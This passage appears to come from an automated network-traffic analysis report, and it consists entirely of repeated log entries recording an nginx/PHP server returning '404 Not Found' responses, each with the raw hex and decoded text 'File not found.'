            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:57:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
